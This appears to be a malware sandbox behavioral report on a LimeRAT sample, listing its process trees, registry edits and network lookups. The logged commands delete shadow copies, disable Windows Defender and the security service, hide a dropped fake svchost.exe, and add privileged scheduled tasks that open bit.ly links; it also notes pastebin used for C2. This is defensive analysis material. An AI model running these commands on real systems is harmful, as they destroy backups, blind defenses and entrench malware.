PID 3232 wrote to memory of 64 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 436 wrote to memory of 4448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 436 wrote to memory of 4448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4020 wrote to memory of 1188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4020 wrote to memory of 1188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1604 wrote to memory of 3628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1604 wrote to memory of 3628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2744 wrote to memory of 2992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2744 wrote to memory of 2992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 408 wrote to memory of 1556 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 408 wrote to memory of 1556 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4376 wrote to memory of 4072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4376 wrote to memory of 4072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3056 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3056 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5056 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:30" /sc daily /mo "4" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:00" /sc daily /mo "4" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "18:27" /sc daily /mo "1" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:11" /sc weekly /mo "5" /d "Sat" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:55" /sc monthly /m "jan" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 ftp.encompossoftware.com udp

Files

memory/5056-0-0x00007FF8AF063000-0x00007FF8AF065000-memory.dmp

memory/5056-1-0x0000023D80EC0000-0x0000023D80F02000-memory.dmp

memory/5056-2-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-3-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdatmkki.eys.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4688-13-0x000001C96B4E0000-0x000001C96B502000-memory.dmp

memory/4688-14-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-15-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-18-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/5056-20-0x00007FF8AF063000-0x00007FF8AF065000-memory.dmp

memory/5056-21-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/5056-33-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:26

Platform

win11-20240419-en

Max time kernel

1197s

Max time network

1198s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2796 wrote to memory of 544 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 544 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 4860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 4860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2684 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4780 wrote to memory of 1400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4780 wrote to memory of 1400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 664 wrote to memory of 4472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 664 wrote to memory of 4472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2304 wrote to memory of 2348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2304 wrote to memory of 2348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3740 wrote to memory of 2316 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3740 wrote to memory of 2316 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3900 wrote to memory of 4876 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3900 wrote to memory of 4876 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2220 wrote to memory of 4240 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2220 wrote to memory of 4240 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3908 wrote to memory of 1692 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3908 wrote to memory of 1692 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1948 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1948 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1916 wrote to memory of 420 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1916 wrote to memory of 420 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4600 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4600 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1352 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1352 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3944 wrote to memory of 1904 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3944 wrote to memory of 1904 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2684 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "02:28" /sc daily /mo "3" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "05:08" /sc daily /mo "2" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "12:13" /sc daily /mo "2" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:52" /sc weekly /mo "5" /d "Thu" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:07" /sc monthly /m "aug" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
